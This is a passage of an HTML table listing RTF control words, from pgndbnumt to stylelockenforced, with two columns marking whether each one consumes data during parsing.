<th scope="row">pgndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndecd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindic</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnlcltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnlcrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaic</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnucltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnucrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnvieta</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pgptbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">phcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">phmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">phpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">picbmp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">picprop</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">picscaled</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pindtabqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pindtabql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pindtabqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">plain</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnacross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnaiu</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnaiud</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnaiueo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnaiueod</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnbidia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnbidib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pncard</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndecd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnhang</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pniroha</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnirohad</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlcltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlcrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlblt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlbody</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnnumonce</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnord</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnordt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnprev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnrnot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnseclvl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntxta</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntxtb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnucltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnucrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldashd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldashdd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulhair</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulwave</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">prcolbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">printdata</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">printim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">private</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">propname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protusertbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">psover</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptabldot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablmdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablminus</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptabluscore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pubauto</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pvpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pvpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">readonlyrecommended</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">readprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">remdttm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rempersonalinfo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">result</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">revisions</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">revprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">revtbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">revtim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">rsidtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltbmp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rslthtml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltmerge</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltpict</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltrtf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rslttxt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtldoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlgutter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rxe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">saftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sautoupd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saveinvalidxml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saveprevpict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sbkcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkeven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbknone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbys</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">scompose</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectdefaultcl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectspecifycl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectspecifygen</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sectspecifyl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectunlocked</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrstpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shidden</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shift</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shpbxcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxignore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbyignore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbymargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbypage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbypara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpgrp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shpinst</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shplockanchor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shppict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shprslt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shptxt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">slocked</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">snaptogridincell</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">softpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">spersonal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">spltpgpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">splytwnine</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprsbsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprslnsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprsspbf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprstsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sprstsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">spv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sqformat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sreply</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">staticval</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">stylelock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelockbackcomp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">stylelockenforced</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
